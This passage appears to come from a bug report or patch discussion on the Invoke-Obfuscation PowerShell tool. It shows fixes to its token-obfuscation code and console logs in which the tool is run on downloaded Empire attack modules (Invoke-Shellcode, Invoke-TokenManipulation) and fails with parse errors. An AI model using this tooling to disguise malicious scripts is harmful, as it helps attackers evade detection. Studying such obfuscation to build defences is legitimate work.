+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ParseException
(errors continue)

& powershell

# Randomly choose between the & and . Invoke Operators.
# In certain large scripts where more than one parameter are being passed into a custom function 
# (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not.
# For now we will default to only & if $ScriptString.Length -gt 10000
If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'}
Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')}

# Add invoke operator (and potentially whitespace) to complete splatting command.
$ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken

# Add the obfuscated token back to $ScriptString.
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length)

Return $ScriptString

# Randomly choose between the & and . Invoke Operators.
# In certain large scripts where more than one parameter are being passed into a custom function 
# (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not.
# For now we will default to only & if $ScriptString.Length -gt 10000
If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'}
Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')}

# Add invoke operator (and potentially whitespace) to complete splatting command.
$ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken

# If an invoke operator is already in use, then we need to wrap this one in parentheses
If($ScriptString.SubString(0,$Token.Start).Trim().EndsWith('&') -or $ScriptString.SubString(0,$Token.Start).Trim().EndsWith('.')) {
	$ObfuscatedToken = '(' + $ObfuscatedToken + ')'
}

# Add the obfuscated token back to $ScriptString.
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length)

Return $ScriptString

PS> git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
PS> wget https://github.com/adaptivethreat/Empire/raw/master/data/module_source/code_execution/Invoke-Shellcode.ps1
PS> Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1

[*] Validating necessary commands are loaded into current PowerShell session.

[*] Function Loaded :: Out-ObfuscatedTokenCommand
[*] Function Loaded :: Out-ObfuscatedStringCommand
[*] Function Loaded :: Out-EncodedAsciiCommand
[*] Function Loaded :: Out-EncodedHexCommand
[*] Function Loaded :: Out-EncodedOctalCommand
[*] Function Loaded :: Out-EncodedBinaryCommand
[*] Function Loaded :: Out-SecureStringCommand
[*] Function Loaded :: Out-EncodedBXORCommand
[*] Function Loaded :: Out-PowerShellLauncher
[*] Function Loaded :: Invoke-Obfuscation

[*] All modules loaded and ready to run Invoke-Obfuscation

PS> Out-ObfuscatedTokenCommand -Path .\Invoke-Shellcode.ps1 | Out-File out
Obfuscating Invoke-Shellcode.ps1

[*] Obfuscating 75 Comment tokens.

[*] Obfuscating 98 String tokens.

[*] Obfuscating 88 Command tokens.

[*] Obfuscating 128 Member tokens.
Exception calling "Create" with "1" argument(s): "At line:18 char:52
+                   ("{0}{1}{2}"-f'I','gnore','Case') = $True )]
+                                                    ~
Missing closing ')' in expression.
At line:18 char:52
+                   ("{0}{1}{2}"-f'I','gnore','Case') = $True )]
+                                                    ~
Parameter declarations are a comma-separated list of variable names with optional initializer expressions.
At line:18 char:52
+                   ("{0}{1}{2}"-f'I','gnore','Case') = $True )]
+                                                    ~
(errors continue)

# The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens.
# Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx
$MemberTokensToOnlyRandomCase  = @()
$MemberTokensToOnlyRandomCase += 'mandatory'
$MemberTokensToOnlyRandomCase += 'position'
$MemberTokensToOnlyRandomCase += 'parametersetname'
$MemberTokensToOnlyRandomCase += 'valuefrompipeline'
$MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname'
$MemberTokensToOnlyRandomCase += 'valuefromremainingarguments'
$MemberTokensToOnlyRandomCase += 'helpmessage'
$MemberTokensToOnlyRandomCase += 'alias'
# Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx
$MemberTokensToOnlyRandomCase += 'confirmimpact'
$MemberTokensToOnlyRandomCase += 'defaultparametersetname'
$MemberTokensToOnlyRandomCase += 'helpuri'
$MemberTokensToOnlyRandomCase += 'supportspaging'
$MemberTokensToOnlyRandomCase += 'supportsshouldprocess'
$MemberTokensToOnlyRandomCase += 'positionalbinding'

$MemberTokensToOnlyRandomCase += 'ignorecase'

PS> git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
PS> wget https://github.com/adaptivethreat/Empire/raw/master/data/module_source/credentials/Invoke-TokenManipulation.ps1
PS> Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1

[*] Validating necessary commands are loaded into current PowerShell session.

[*] Function Loaded :: Out-ObfuscatedTokenCommand
[*] Function Loaded :: Out-ObfuscatedStringCommand
[*] Function Loaded :: Out-EncodedAsciiCommand
[*] Function Loaded :: Out-EncodedHexCommand
[*] Function Loaded :: Out-EncodedOctalCommand
[*] Function Loaded :: Out-EncodedBinaryCommand
[*] Function Loaded :: Out-SecureStringCommand
[*] Function Loaded :: Out-EncodedBXORCommand
[*] Function Loaded :: Out-PowerShellLauncher
[*] Function Loaded :: Invoke-Obfuscation

[*] All modules loaded and ready to run Invoke-Obfuscation

PS> Out-ObfuscatedTokenCommand -Path .\Invoke-TokenManipulation.ps1 | Out-File out
Exception calling "Create" with "1" argument(s): "At line:657 char:17
+ ...             ("{2}{5}{6}{1}{4}{3}{0}"-f 'ege','eP','Se','efilePrivil', ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:658 char:17
+ ...               ("{3}{0}{1}{2}" -f 'DebugPr','ivi','lege','Se'), {"{6}{ ...
+                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:659 char:17
+ ...             ("{3}{2}{5}{4}{0}{6}{1}"-f 'i','ege','seQ','SeIncrea','ta ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:660 char:17
+ ...             ("{2}{1}{3}{4}{0}" -f'ilege','Vol','SeManage','umePri','v ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:661 char:17
+ ...             ("{4}{5}{1}{0}{2}{3}"-f'vi','i','l','ege','SeS','ecurityP ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:662 char:17
+ ...             ("{2}{6}{3}{1}{4}{0}{5}" -f 'P','im','Se','ystemt','e','r ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:663 char:17
+ ...               ("{1}{2}{0}{3}" -f'rivil','SeU','ndockP','ege'), {"{2}{ ...
+                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block."
(errors continue)

function Enable-Privilege
{
	Param(
		[Parameter()]
		[ValidateSet("SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeBackupPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege",
			"SeCreatePagefilePrivilege", "SeCreatePermanentPrivilege", "SeCreateSymbolicLinkPrivilege", "SeCreateTokenPrivilege",
			"SeDebugPrivilege", "SeEnableDelegationPrivilege", "SeImpersonatePrivilege", "SeIncreaseBasePriorityPrivilege",
			"SeIncreaseQuotaPrivilege", "SeIncreaseWorkingSetPrivilege", "SeLoadDriverPrivilege", "SeLockMemoryPrivilege", "SeMachineAccountPrivilege",
			"SeManageVolumePrivilege", "SeProfileSingleProcessPrivilege", "SeRelabelPrivilege", "SeRemoteShutdownPrivilege", "SeRestorePrivilege",
			"SeSecurityPrivilege", "SeShutdownPrivilege", "SeSyncAgentPrivilege", "SeSystemEnvironmentPrivilege", "SeSystemProfilePrivilege",
			"SeSystemtimePrivilege", "SeTakeOwnershipPrivilege", "SeTcbPrivilege", "SeTimeZonePrivilege", "SeTrustedCredManAccessPrivilege",
			"SeUndockPrivilege", "SeUnsolicitedInputPrivilege")]
		[String]
		$Privilege
	)
	Write-Verbose "Enabled privilege: $Privilege"
}

$EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE

# If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding.
If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($ScriptString.SubString($Token.Start-5,5).Contains('(') -OR $ScriptString.SubString($Token.Start-5,5).Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('('))
{
	# Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock.
	$ParameterBindingName = $ScriptString.SubString(0,$Token.Start)
	$ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('('))
	$ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim()

	# Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc.
	If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0))
	{
		# If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function.
		If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower())
		{
			$EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE
		}
	}
}

$EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE

$LastEndBracketIndex = $ScriptString.LastIndexOf(']', $Token.Start)
$LastBeginBracketIndex = $ScriptString.LastIndexOf('[', $Token.Start)
If($LastBeginBracketIndex -gt $LastEndBracketIndex) {
	$ScriptSubString = $ScriptString.SubString($LastBeginBracketIndex, $Token.Start-$LastBeginBracketIndex)

	# If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding.
	If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($ScriptSubString.Contains('(')) )
	{
		# Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock.
		$ParameterBindingName = $ScriptSubString.SubString(0,$ScriptSubString.LastIndexOf('('))
		$ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim()
		
		# Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc.
		If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0))
		{
			# If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function.
			If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower())
			{
				$EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE
			}
		}
	}
}

"
$script
"